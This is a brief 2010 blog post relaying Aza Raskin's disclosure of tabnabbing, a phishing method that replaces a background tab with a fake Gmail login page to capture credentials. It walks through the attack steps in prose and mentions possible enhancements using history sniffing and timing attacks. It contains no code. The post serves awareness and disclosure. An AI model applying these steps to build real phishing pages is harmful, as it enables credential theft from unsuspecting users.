Tuesday, May 25th, 2010p>Aza Raskin identifies yet another form of phishing attack. Tabnabbing is the process of replacing the entire contents of a page while it’s in a background tab. Want to see it in action? Just visit Aza’s article, switch to another tab for 5 seconds and see what happens. Nice clean demo, and as scary as it is simple.
The steps in detail:
- A user navigates to your normal looking site.
- You detect when the page has lost its focus and hasn’t been interacted with for a while.
- As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
- After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.
Aza also notes the attack could get a lot more potent if they (a) used the CSS history exploit to discover which sites the user has visited; (b) employed certain other techniques, like timing attacks, to determine which services a user is currently logged into.